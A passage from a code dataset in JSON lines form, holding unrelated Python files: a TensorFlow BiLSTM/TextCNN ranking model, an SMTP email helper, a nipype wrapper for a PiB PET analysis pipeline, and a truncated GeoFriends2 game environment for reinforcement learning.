name='dropout')\n\n with tf.name_scope('full_con_layer'):\n self.l2_loss = 0\n num_out = 1\n SoftMax_W = tf.Variable(tf.truncated_normal([max_num, num_out], stddev=0.01), name='softmax_linear_weight')\n SoftMax_b = tf.Variable(tf.constant(0.1, shape=[num_out]), name='softmax_linear_bias')\n self.l2_loss += tf.nn.l2_loss(SoftMax_W)\n self.l2_loss += tf.nn.l2_loss(SoftMax_b)\n self.softmax_values_pos = tf.nn.xw_plus_b(dropout_pro_layer_pos, SoftMax_W, SoftMax_b,\n name='soft_values')\n self.softmax_values_neg = tf.nn.xw_plus_b(dropout_pro_layer_neg, SoftMax_W, SoftMax_b,\n name='soft_values')\n\n self.score_pos = self.softmax_values_pos\n self.score_neg = self.softmax_values_neg\n\n '''\n 7. calculate loss\n '''\n with tf.name_scope('loss'):\n self.margin = tf.placeholder(tf.float32)\n self.loss = tf.reduce_sum(tf.maximum(0.0, self.margin - self.score_pos + self.score_neg))\n\n '''\n 8. calcalate accuarcy\n '''\n with tf.name_scope('accuracy'):\n self.acc = tf.reduce_mean(tf.maximum(tf.sign(self.score_pos - self.score_neg), 0.))\n\n '''\n 9. use optimizer\n '''\n with tf.name_scope('train'):\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.session = tf.Session()\n self.saver = tf.train.Saver()\n\n def __add_conv_layer(self, concat, W, b, filter_size):\n with tf.name_scope('conv_maxpool_layer'):\n # 参数说明\n # 第一个参数input:指需要做卷积的输入图像 [训练时一个batch的图片数量, 图片高度, 图片宽度, 图像通道数]\n # 第二个参数filter:相当于CNN中的卷积核 [卷积核的高度,卷积核的宽度,图像通道数,卷积核个数]\n # 第三个参数strides:卷积时在图像每一维的步长,这是一个一维的向量,长度4,\n # 第四个参数padding:string类型的量,只能是\"SAME\",\"VALID\"其中之一,这个值决定了不同的卷积方式\n # 第五个参数:use_cudnn_on_gpu: bool类型,是否使用cudnn加速,默认为true\n conv_layer = tf.nn.conv2d(concat, W, strides=[1, 1, 1, 1], padding='VALID',\n name='conv_layer')\n relu_layer = tf.nn.relu(tf.nn.bias_add(conv_layer, b), name='relu_layer')\n\n max_pool_layer = tf.nn.max_pool(relu_layer, ksize=[1, self.seq_length - filter_size + 1, 1, 1],\n strides=[1, 1, 1, 1], padding='VALID', name='maxpool')\n return max_pool_layer\n\n def train(self):\n os.mkdir('./model/' + self.name)\n f = open('./log/' + self.name + 'log_train.txt', 'w')\n self.session.run(tf.global_variables_initializer())\n # self.session = tf_debug.LocalCLIDebugWrapperSession(sess=self.session)\n # 迭代训练\n min_loss = 9999999\n max_acc = 0.0\n for epoch in range(self.epochs):\n train_batch = self.dataset.get_train_batch(self.batch_size)\n feed = {\n self.input_zh: train_batch[5][0],\n self.input_pos: train_batch[5][1],\n self.input_neg: train_batch[5][2],\n self.zh_seq_len: train_batch[5][3],\n self.pos_seq_len: train_batch[5][4],\n self.neg_seq_len: train_batch[5][5],\n self.zh_dict_vec: self.dataset.zh_embedding_matrix,\n self.en_dict_vec: self.dataset.en_embedding_matrix,\n self.margin: 1.0,\n self.keep_prob: self.dropout_pro_item\n }\n _, loss, accuracy, s_pos, s_neg = self.session.run(\n [self.optimizer, self.loss, self.acc, self.score_pos, self.score_neg], feed_dict=feed)\n f.write('Epoch {:>3} train_loss = {} accuracy = {} + \\n'.\n format(epoch, loss, accuracy))\n if epoch % 50 == 0:\n print('Epoch {:>3} train_loss = {} accuracy = {} + \\n'.\n format(epoch, loss, accuracy))\n if accuracy > max_acc:\n print('updata new model')\n if accuracy != 1.0:\n max_acc = accuracy\n min_loss = loss\n self.saver.save(self.session,\n './model/' + self.name + '/' + str(epoch) + '_' + str(loss) + '_' + str(\n accuracy) + '.ckpt')\n self.saver.save(self.session,\n './model/' + self.name + '/last epoch' + '_' + str(loss) + '_' + str(\n accuracy) + '.ckpt')\n\n def val(self, epoch):\n val_batch_data, val_abs_data = self.dataset.get_val_data(batch_size=129)\n acc_top1 = 0.\n acc_top10 = 0.\n\n for j in range(len(val_batch_data)):\n score = self.session.run(self.score_pos, feed_dict={\n self.input_zh: val_abs_data[j][0],\n self.input_pos: val_abs_data[j][2],\n self.zh_seq_len: val_abs_data[j][1],\n self.pos_seq_len: val_abs_data[j][3],\n self.zh_dict_vec: self.dataset.zh_embedding_matrix,\n self.en_dict_vec: self.dataset.en_embedding_matrix,\n self.keep_prob: 1.0,\n self.margin: 1.0})\n\n assert len(score) == 100\n n = 0\n for k in range(1, 100):\n if score[0] <= score[k]: # score越大越好\n n += 1\n if n == 0:\n acc_top1 += 1\n if n < 10:\n acc_top10 += 1\n acc_top1 = float(acc_top1) / float(len(val_batch_data))\n acc_top10 = float(acc_top10) / float(len(val_batch_data))\n print(\"epoch = {} val top 1 acc = {} test top 10 acc:={}\".format(epoch, acc_top1, acc_top10))\n\n return acc_top1\n\n def test(self, model_name):\n test_batch_data, test_abs_data = self.dataset.get_test_data()\n acc_top1 = 0.\n acc_top10 = 0.\n\n self.saver.restore(self.session, 'model/' + self.name + '/' + model_name + '.cpkt')\n\n f = open('./log/' + self.name + model_name + 'log_test.txt', 'w')\n\n for j in range(len(test_batch_data)):\n score = self.session.run(self.score_pos, feed_dict={\n self.input_zh: test_abs_data[j][0],\n self.input_pos: test_abs_data[j][2],\n self.input_zh_title: test_abs_data[j][4],\n self.input_pos_title: test_abs_data[j][5],\n self.zh_seq_len: test_abs_data[j][1],\n self.pos_seq_len: test_abs_data[j][3],\n self.zh_dict_vec: self.dataset.zh_embedding_matrix,\n self.en_dict_vec: self.dataset.en_embedding_matrix,\n self.keep_prob: 1.0,\n self.margin: 1.0})\n assert len(score) == 100\n\n f.write('batch :' + str(j) + '\\n')\n print('batch :' + str(j))\n f.write('score[0]: ' + str(score[0]) + '\\n')\n print('score[0]: ' + str(score[0]))\n\n n = 0\n for k in range(1, 100):\n if score[0] <= score[k]: # score越大越好\n n += 1\n print(str(score[k]))\n\n f.write(str(score[k]) + '\\n')\n\n if n == 0:\n acc_top1 += 1\n print(acc_top1)\n if n < 10:\n acc_top10 += 1\n print(acc_top10)\n\n f.write('\\n')\n print('')\n\n f.write('acc_top1=' + str(acc_top1) + ' ' + 'acc_top10=' + str(\n acc_top10) + ' ' + 'len(test_batch_data)' + str(len(test_batch_data)))\n print('acc_top1=' + str(acc_top1) + ' ' + 'acc_top10=' + str(\n acc_top10) + ' ' + 'len(test_batch_data)' + str(len(test_batch_data)))\n\n acc_top1 = float(acc_top1) / float(len(test_batch_data))\n acc_top10 = float(acc_top10) / float(len(test_batch_data))\n f.write(\"test top 1 acc = {} test top 10 acc:={}\".format(acc_top1, acc_top10))\n f.close()\n print(\"test top 1 acc = {} test top 10 acc:={}\".format(acc_top1, acc_top10))\n\n def close(self):\n self.session.close()\n\n\n\nif __name__ == '__main__':\n # step 1: load data\n print(\"Loading training and validation data...\")\n dataset = DataSet.DataSet()\n\n print('Configuring CNN model...')\n # step3 create TextCNN model\n text_cnn = TextCNN(dataset=dataset,\n filter_numbers=128,\n sentence_length=100,\n lstm_n_hidden=64,\n lstm_n_layer=3,\n cnn_layer_size_list=[3, 4, 5],\n learn_rate=1e-3,\n epochs=5000,\n batch_size=256,\n dropout_pro=0.6)\n # step4 start train\n text_cnn.train()\n # step5 test\n text_cnn.test()\n\n text_cnn.close()","sub_path":"BiLSTM_TextCNN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"508210397","text":"#!usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n#\r\n#Created on 2015-04-12\r\n#author: ryanrmeng\r\n#\r\n################################################################################\r\nimport logging\r\nimport smtplib\r\nimport os\r\nimport app_config\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom app_config import smtp_mail_acc\r\n\r\n# 有些服务器强制要求TLS加密,需要在login前设置TLS模式,添加代码:\r\n# smtp.ehlo() # 向服务器发送ehlo命令\r\n# smtp.starttls() # 启用TLS加密模式,部分SMTP服务器强制要求\r\ndef send_mail(send_to, subject, html_body, send_cc=None, send_bcc=None):\r\n send_from = '%s<%s@%s>' % (smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_USER,\r\n smtp_mail_acc.MAIL_DOMAIN)\r\n # Create message container - MIME type is multipart/alternative\r\n msg = MIMEMultipart('alternative')\r\n msg['Subject'] = subject\r\n msg['From'] = send_from\r\n msg['To'] = ';'.join(send_to)\r\n if send_cc:\r\n msg['Cc'] = ';'.join(send_cc)\r\n if send_bcc:\r\n msg['Bcc'] = ';'.join(send_bcc)\r\n \r\n msg_body = MIMEText(html_body, 'html')\r\n msg.attach(msg_body)\r\n \r\n with smtplib.SMTP(smtp_mail_acc.SMTP_HOST, smtp_mail_acc.SMTP_PORT) as smtp:\r\n smtp.login(smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_PASS)\r\n if send_cc:\r\n smtp.sendmail(send_from, send_to+send_cc+send_bcc, msg.as_string())\r\n else:\r\n smtp.sendmail(send_from, send_to, msg.as_string())\r\n \r\n smtp.quit()\r\n\r\ndef send_mail_attach(send_to, subject, html_body, filelist, send_cc=None, send_bcc=None):\r\n send_from = '%s<%s@%s>' % (smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_USER,\r\n smtp_mail_acc.MAIL_DOMAIN)\r\n # Create message container - MIME type is multipart/alternative\r\n msg = MIMEMultipart('alternative')\r\n msg['Subject'] = subject\r\n msg['From'] = send_from\r\n msg['To'] = ';'.join(send_to)\r\n if send_cc:\r\n msg['Cc'] = ';'.join(send_cc)\r\n if send_bcc:\r\n msg['Bcc'] = ';'.join(send_bcc)\r\n\r\n msg_body = MIMEText(html_body, 'html')\r\n msg.attach(msg_body)\r\n\r\n #add acctch file\r\n for name in filelist:\r\n attach(msg, name)\r\n\r\n with smtplib.SMTP(smtp_mail_acc.SMTP_HOST, smtp_mail_acc.SMTP_PORT) as smtp:\r\n smtp.login(smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_PASS)\r\n if send_cc:\r\n smtp.sendmail(send_from, send_to+send_cc+send_bcc, msg.as_string())\r\n else:\r\n smtp.sendmail(send_from, send_to, msg.as_string())\r\n \r\n smtp.quit()\r\n\r\ndef attach(msg, filename):\r\n full_filename = os.path.join(app_config.attachDir, filename)\r\n name = os.path.basename(full_filename)\r\n att = MIMEText(open(full_filename.encode(\"gbk\"), 'rb').read(), 'base64', 'gb2312')\r\n att[\"Content-Type\"] = 'application/octet-stream'\r\n att[\"Content-Disposition\"] = 'attachment; filename=\"%s\"' % (name)\r\n msg.attach(att)\r\n\r\nif __name__ == '__main__':\r\n print('Unit Test Begin!')\r\n logging.basicConfig(level=logging.DEBUG,\r\n format='%(asctime)s %(filename)s:%(lineno)d [%(levelname)s] %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n filename=str(general_utils.get_log_path().joinpath('send_mail.log')),\r\n filemode='a')\r\n logging.getLogger().addHandler(logging.StreamHandler())\r\n \r\n send_mail(['123@qq.com'],\r\n 'Good Morning :)', 'Hello body!')\r\n \r\n print('Unit Test End!')\r\n","sub_path":"sendmail/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"274854700","text":"from nipype.interfaces.base import TraitedSpec, File, Directory, traits, CommandLineInputSpec, CommandLine\nfrom glob import glob\nimport os\n\ndef get_value(key, dict):\n return dict[key]\n\ndef concat_dirs(dir1, dir2):\n import os\n return os.path.join(dir1, 'BLSA_'+dir2)\n\nclass PipelineWrapperInputSpec(CommandLineInputSpec):\n pet4D = File(desc=\"path to 4D PET image\", exists=True, mandatory=True, position=0, argstr=\"%s\")\n pettiming = File(desc=\"path to csv file describing PET timing info\", exists=True, mandatory=True, position=1, argstr=\"%s\")\n mri = File(desc=\"path to preprocessed MRI image without skull\", exists=True, mandatory=True, position=3, argstr=\"%s\")\n label = File(desc=\"path to anatomical label image (in MRI space)\", exists=True, mandatory=True, position=4, argstr=\"%s\")\n mnitransform = File(desc=\"path to composite (deformable) transform that takes MRI to MNI space\", exists=True, mandatory=True, position=5, argstr=\"%s\")\n outputdir = Directory(desc=\"output directory\", exists=False, mandatory=True, position=6, argstr=\"%s\")\n\n t_start = traits.Float(desc=\"Frames prior to t_start (in min) will be excluded from analysis\",\n mandatory=False, argstr=\"--t_start %f\")\n t_end_realign = traits.Float(desc=\"Time frame alignment will use the average of frames prior to t_end_realign (in min) as the target\",\n mandatory=False, argstr=\"--t_end_realign %f\")\n t_end_coreg = traits.Float(desc=\"MRI coregistration will use the average of the frames prior to t_end_coreg (in min) as the source\",\n mandatory=False, argstr=\"--t_end_coreg %f\")\n t_end_EA = traits.Float(desc=\"early amyloid image will be computed as the average of frames prior to t_end_EA (in min)\",\n mandatory=False, argstr=\"--t_end_EA %f\")\n t_end_kinetic_model = traits.Float(desc=\"Parametric images will be computed as the average of frames between t_start and t_end_kinetic_model (in min)\",\n mandatory=False, argstr=\"--t_end_kinetic_model %f\")\n t_start_SUVR = traits.Float(desc=\"SUVR image will be computed as the average of frames between t_start_SUVR and t_end_SUVR (in min)\",\n mandatory=False, argstr=\"--t_start_SUVR %f\")\n t_end_SUVR = traits.Float(desc=\"SUVR image will be computed as the average of frames between t_start_SUVR and t_end_SUVR (in min)\",\n mandatory=False, argstr=\"--t_end_SUVR %f\")\n no_pvc = traits.Bool(desc=\"if True, do not perform partial volume correction (default is to perform partial volume correction)\",\n mandatory=False, argstr=\"--no_pvc\")\n psf_fwhm_x = traits.Float(desc=\"PET scanner PSF FWHM along x (in mm)\",\n mandatory=False, argstr=\"--psf_fwhm_x %f\")\n psf_fwhm_y = traits.Float(desc=\"PET scanner PSF FWHM along y (in mm)\",\n mandatory=False, argstr=\"--psf_fwhm_y %f\")\n psf_fwhm_z = traits.Float(desc=\"PET scanner PSF FWHM along z (in mm)\",\n mandatory=False, argstr=\"--psf_fwhm_z %f\")\n smooth_fwhm = traits.Float(desc=\"FWHM of Gaussian smoothing filter (in mm)\",\n mandatory=False, argstr=\"--smooth_fwhm %f\")\n n_procs = traits.Int(desc=\"number of parallel processes\", mandatory=False,\n argstr=\"--n_procs %d\")\n\nclass PipelineWrapperOutputSpec(TraitedSpec):\n dvr_xlsx = File(desc=\"DVR spreadsheet\", exists=True)\n dvr_pvc_xlsx = File(desc=\"DVR spreadsheet (with PVC)\", exists=True)\n\n r1_xlsx = File(desc=\"R1 spreadsheet\", exists=True)\n r1_pvc_xlsx = File(desc=\"R1 spreadsheet (with PVC)\", exists=True)\n\n r1_lrsc_xlsx = File(desc=\"R1 LRSC spreadsheet\", exists=True)\n r1_lrsc_pvc_xlsx = File(desc=\"R1 LRSC spreadsheet (with PVC)\", exists=True)\n\n suvr_xlsx = File(desc=\"SUVR spreadsheet\", exists=True)\n suvr_pvc_xlsx = File(desc=\"SUVR spreadsheet (with PVC)\", exists=True)\n\n ea_xlsx = File(desc=\"EA spreadsheet\", exists=True)\n ea_pvc_xlsx = File(desc=\"EA spreadsheet (with PVC)\", exists=True)\n\n ea_wb_xlsx = File(desc=\"EA wb spreadsheet\", exists=True)\n ea_pvc_wb_xlsx = File(desc=\"EA wb spreadsheet (with PVC)\", exists=True)\n\nclass PipelineWrapper(CommandLine):\n _cmd = 'python /code/pib.py'\n input_spec = PipelineWrapperInputSpec\n output_spec = PipelineWrapperOutputSpec\n\n def _list_outputs(self):\n # one output should be the full path to the SUVR spreadsheet\n outputs = self._outputs().get()\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_workflow','ROImeans_dvr','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['dvr_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No DVR xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_workflow','ROImeans_r1_wlr','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_workflow','ROImeans_r1_lrsc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_lrsc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 LRSC xlsx found!')\n\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_workflow','ROImeans_EA','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_workflow','ROImeans_EA_wb','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_wb_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA WB xlsx found!')\n\n\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_pvc_workflow','ROImeans_dvr_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['dvr_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No DVR PVC xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_pvc_workflow','ROImeans_r1_wlr_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 PVC xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_pvc_workflow','ROImeans_r1_lrsc_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_lrsc_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 LRSC PVC xlsx found!')\n\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_pvc_workflow','ROImeans_EA_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA PVC xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_pvc_workflow','ROImeans_EA_pvc_wb','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_pvc_wb_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA PVC WB xlsx found!')\n\n\n\n\n suvr_xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','SUVR_workflow','ROImeans','*.xlsx'))\n if suvr_xlsx_list and len(suvr_xlsx_list)==1:\n outputs['suvr_xlsx'] = suvr_xlsx_list[0]\n else:\n raise ValueError('No SUVR xlsx found!')\n\n suvr_xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','SUVR_pvc_workflow','ROImeans_pvc','*.xlsx'))\n if suvr_xlsx_list and len(suvr_xlsx_list)==1:\n outputs['suvr_pvc_xlsx'] = suvr_xlsx_list[0]\n else:\n raise ValueError('No SUVR PVC xlsx found!')\n\n return outputs\n","sub_path":"pib_wrapper.py","file_name":"pib_wrapper.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"322619931","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport socket\nimport math\nimport subprocess\nfrom random import randint, choice\n\nfrom enum import Enum\n\nfrom simulator.GF2 import GF2Sim\n\n\nclass OutputType(Enum):\n FULL = 1\n RETINA = 2\n SIMPLE = 3\n RECT_SIMPLE = 4\n\n\nclass Obstacle(object):\n def __init__(self, center_x, center_y, half_width, half_height):\n self.top_y = center_y - half_height\n self.bot_y = center_y + half_height\n self.left_x = center_x - half_width\n self.right_x = center_x + half_width\n\n self.center_x = center_x\n self.center_y = center_y\n self.width = half_width\n self.height = half_height\n\n def __str__(self):\n return \"*(\" + str(self.left_x) + \",\" + str(self.top_y) + \"):(\" + str(self.right_x) + \",\" + str(\n self.bot_y) + \")*\"\n\n\nclass GymGeoFriends2(object):\n def __init__(self, rect_actions, circle_actions, id_thread, rectangle=False, circle=True):\n self.numberOfActions_rect = rect_actions\n self.numberOfActions_circle = circle_actions\n\n self.debug = False\n self.id = id_thread + 1\n\n self.number_of_rectangle = 1 # number of agents\n self.number_of_circle = 1\n\n self.output_type = OutputType.RECT_SIMPLE\n\n if self.output_type == OutputType.SIMPLE:\n self.width = 2 + 2 + 2 + 5 # walls left and right, speed, closest reward, reward counter, mov counter, jump stats, time\n elif self.output_type == OutputType.RECT_SIMPLE:\n self.width = 9 # closest reward, closest hole, closest wall, width/growing, rewards left\n self.width_circ = 11 # closest reward, closest hole, closest wall, width/growing, rewards left\n elif self.output_type == OutputType.RETINA:\n self.width = 10 + 4 + 3 * 3 # retina\n else:\n self.width = 10 + 4 + 4 * 3 + 1 + 1 + 2 + 1 # points, pos/vel, rewards (pos, dist, existing), reward counter, mov counter, jump stats, time\n\n self.height = 1 # features\n self.input_size = self.width # * self.numberOfMapCells\n self.input_size_circ = self.width_circ\n\n self._screen_rectangle = np.zeros([1, self.input_size])\n self._screen_circle = np.zeros([1, self.input_size_circ])\n\n self.reward_rectangle = 0 # current processed reward\n self.reward_circle = 0\n self.terminal = False # whether simulation is on-going\n self.display = False\n if self.id != 1:\n self.display = False\n\n self.circle = circle\n self.rectangle = rectangle\n\n self.len_points = 10\n self.goingRight = True\n\n # ready game-socket here\n print(self.id)\n if self.circle:\n self.previous_size_circ = -1\n self.previous_leftover_message_circ = ''\n\n if self.rectangle:\n self.previous_size_rect = -1\n self.previous_leftover_message_rect = ''\n\n self.simulator = GF2Sim(gui=self.display)\n\n self.obstacles_circ = None\n self.obstacles_rect = None\n\n self.circle_mov_counter = 0\n self.rectangle_mov_counter = 0\n\n self.prev_map = 4\n\n self.scale_rect_output = np.array([1280, 800, 1280, 800, 1280, 800, 1, 240, 3])\n\n def new_episode(self):\n if self.rectangle and not self.circle:\n map_number = randint(9, 16)\n elif not self.rectangle and self.circle:\n map_number = randint(1, 10)\n else:\n map_number = randint(9, 10)\n self.prev_map = map_number\n\n self.simulator.reset(map_number=map_number, circle=self.circle, rectangle=self.rectangle)\n print(str(self.id) + \" - Starting simulation\")\n\n self.obstacles_circ = list(self.simulator.obstacles)\n self.obstacles_rect = list(self.simulator.obstacles)\n\n self.terminal = False\n self._screen_rectangle = np.zeros([1, self.input_size])\n self._screen_circle = np.zeros([1, self.input_size_circ])\n self.reward_rectangle = 0\n self.reward_circle = 0\n\n self.circle_mov_counter = 0\n self.rectangle_mov_counter = 0\n\n return self._screen_rectangle, self._screen_circle, self.reward_rectangle, self.reward_circle, self.terminal\n\n def get_htg_rect(self):\n action_vals = [-1, -1, -1, 0]\n\n reward_above_me = self._screen_rectangle[0][1] - \\\n (self.simulator.rect_max + self.simulator.rect_min - self._screen_rectangle[0][7]) / 2 < 0\n reward_left = self._screen_rectangle[0][0] < 0\n hole_left = self._screen_rectangle[0][3] > 0\n hole_right = self._screen_rectangle[0][5] > 0\n reward_closer_than_hole = (reward_left and self._screen_rectangle[0][0] > self._screen_rectangle[0][2]) or \\\n (not reward_left and self._screen_rectangle[0][0] < self._screen_rectangle[0][4])\n rectangle_larger_than_hole = (reward_left and self._screen_rectangle[0][3] == 0) or \\\n (not reward_left and self._screen_rectangle[0][5] == 0)\n rectangle_growing_side = self._screen_rectangle[0][6]\n\n if reward_above_me:\n if reward_closer_than_hole or rectangle_larger_than_hole:\n if reward_left:\n action_vals[0] = 1\n else:\n action_vals[1] = 1\n if reward_closer_than_hole and rectangle_growing_side: # grow high\n action_vals[2] = 1\n else: # if hole closer than reward and we fall through it, move away from reward\n if reward_left:\n action_vals[1] = 1\n else:\n action_vals[0] = 1\n if not rectangle_growing_side:\n action_vals[2] = 1\n else: # reward below, hole before reward\n if hole_left:\n action_vals[0] = 1\n elif hole_right:\n action_vals[1] = 1\n else:\n action_vals[3] = 1\n\n if rectangle_growing_side:\n action_vals[2] = 1\n\n return action_vals\n\n def get_trainer_action_rectangle(self):\n possibles = [(x, y) for x, y in enumerate(self.get_htg_rect())]\n return choice([a[0] for a in possibles if a[1] == 1])\n\n def get_trainer_action_circle(self):\n possibles = [(x, y) for x, y in enumerate(self.get_htg_circ())]\n return choice([a[0] for a in possibles if a[1] == 1])\n\n def get_htg_circ(self):\n action_vals = [-1, -1, 0]\n\n reward_above_me = self._screen_circle[0][1] - self.simulator.circle_radius < 0\n reward_left = self._screen_circle[0][0] < 0\n\n reward_closer_than_hole = (reward_left and self._screen_circle[0][0] > self._screen_circle[0][2]) or \\\n (not reward_left and self._screen_circle[0][0] < self._screen_circle[0][4])\n circle_jumping = bool(self._screen_circle[0][6])\n if circle_jumping:\n action_vals[2] = -1\n\n if reward_above_me:\n if reward_closer_than_hole:\n if reward_left:\n action_vals[0] = 1\n else:\n action_vals[1] = 1\n if not circle_jumping and abs(self._screen_circle[0][0]) < self.simulator.circle_radius:\n action_vals[2] = 1\n else: # if hole closer than reward, jump over it\n if reward_left:\n action_vals[0] = 1\n if not circle_jumping and self._screen_circle[0][2] > -self.simulator.circle_radius * 2:\n action_vals[2] = 1\n else:\n action_vals[1] = 1\n if not circle_jumping and self._screen_circle[0][4] < self.simulator.circle_radius * 2:\n action_vals[2] = 1\n\n else: # reward below\n # if reward_closer_than_hole:\n if reward_left:\n action_vals[0] = 1\n if not circle_jumping and self._screen_circle[0][2] > -self.simulator.circle_radius * 2:\n action_vals[2] = 1\n else:\n action_vals[1] = 1\n if not circle_jumping and self._screen_circle[0][4] < self.simulator.circle_radius * 2:\n action_vals[2] = 1\n \"\"\"else:\n if (-self._screen_circle[0][2] < self._screen_circle[0][4] and self._screen_circle[0][3] > 40) \\\n or self._screen_circle[0][5] <= 40:\n action_vals[0] = 1\n elif (-self._screen_circle[0][2] > self._screen_circle[0][4] and self._screen_circle[0][5] > 40) \\\n or self._screen_circle[0][3] <= 40:\n action_vals[1] = 1\"\"\"\n\n return action_vals\n\n def get_state(self):\n return self._screen_rectangle, self._screen_circle\n\n def is_episode_finished(self):\n return self.terminal\n\n @property\n def screen(self):\n return self._screen_rectangle\n\n @property\n def action_size(self):\n return [self.numberOfActions_rect, self.numberOfActions_circle]\n\n @property\n def lives(self):\n return 1\n\n @property\n def state(self):\n return self._screen_rectangle, self.reward_rectangle, self.terminal\n\n def observe(self):\n time_counter = max(self._screen_circle[0][-1], self._screen_rectangle[0][-1])\n self._screen_rectangle = np.zeros([1, self.input_size])\n self._screen_circle = np.zeros([1, self.input_size_circ])\n self._screen_rectangle[0][-1] = time_counter\n self._screen_circle[0][-1] = time_counter\n\n # STATE = corner points (2*4), floor/ceiling height (2x1), position (2x1), speed (2x1), rewards (2xN), rewards distance (1xN)\n\n terminal_circ, terminal_rect = False, False\n if self.circle:\n terminal_circ = self.circle_output(self.simulator.get_circ_state())\n if self.rectangle:\n terminal_rect = self.rectangle_output(self.simulator.get_rect_state())\n\n self.terminal = terminal_circ or terminal_rect\n\n return self._screen_rectangle / self.scale_rect_output, self._screen_circle, self.reward_rectangle, self.reward_circle, self.terminal\n\n def act(self, actions):\n self.simulator.pass_turn(action_rectangle=actions[0], action_circle=actions[1])\n\n if actions[0] == 1:\n self.rectangle_mov_counter = (\n self.rectangle_mov_counter + 1) if self.rectangle_mov_counter + 1 < 200 else 200\n elif actions[0] == 0:\n self.rectangle_mov_counter = self.rectangle_mov_counter - 1 if self.rectangle_mov_counter - 1 > -200 else -200\n\n if actions[1] == 1:\n self.circle_mov_counter = (self.circle_mov_counter + 1) if self.circle_mov_counter + 1 < 200 else 200\n elif actions[1] == 0:\n self.circle_mov_counter = self.circle_mov_counter - 1 if self.circle_mov_counter - 1 > -200 else -200\n\n def close(self):\n pass\n\n def rectangle_output(self, data):\n # [ closest_reward_x, closest_reward_y,\n # left_hole_x, left_hole_width,\n # right_hole_x, right_hole_width,\n # growing_wide_boolean, width,\n # reward_counter ]\n\n # TODO: maybe for from high to low instead of closest\n my_x = data[0]\n my_y = data[1]\n\n # closest reward\n rwrd1, rwrd2, rwrd3 = (1000, 1000), (1000, 1000), (1000, 1000)\n if len(data) > 4:\n rwrd1 = (data[4] - my_x, data[5] - my_y)\n if len(data) > 6:\n rwrd2 = (data[6] - my_x, data[7] - my_y)\n if len(data) > 8:\n rwrd3 = (data[8] - my_x, data[9] - my_y)\n d1 = math.sqrt(rwrd1[0] ** 2 + rwrd1[1] ** 2)\n d2 = math.sqrt(rwrd2[0] ** 2 + rwrd2[1] ** 2)\n d3 = math.sqrt(rwrd3[0] ** 2 + rwrd3[1] ** 2)\n if d1 < d2 and d1 < d3:\n self._screen_rectangle[0][0], self._screen_rectangle[0][1] = rwrd1[0], rwrd1[1]\n elif d2 < d1 and d2 < d3:\n self._screen_rectangle[0][0], self._screen_rectangle[0][1] = rwrd2[0], rwrd2[1]\n elif d3 < d1 and d3 < d2:\n self._screen_rectangle[0][0], self._screen_rectangle[0][1] = rwrd3[0], rwrd3[1]\n\n # ground holes in both directions\n hole_left, hole_right = self.get_rect_points()\n self._screen_rectangle[0][2] = hole_left[0] - my_x\n self._screen_rectangle[0][3] = 0 if hole_left[1] < data[3] + 20 else 1 # 1 if needs to grow wide\n self._screen_rectangle[0][4] = hole_right[0] - my_x\n self._screen_rectangle[0][5] = 0 if hole_right[1] < data[3] + 20 else 1 # 1 if needs to grow wide\n\n # wall holes in 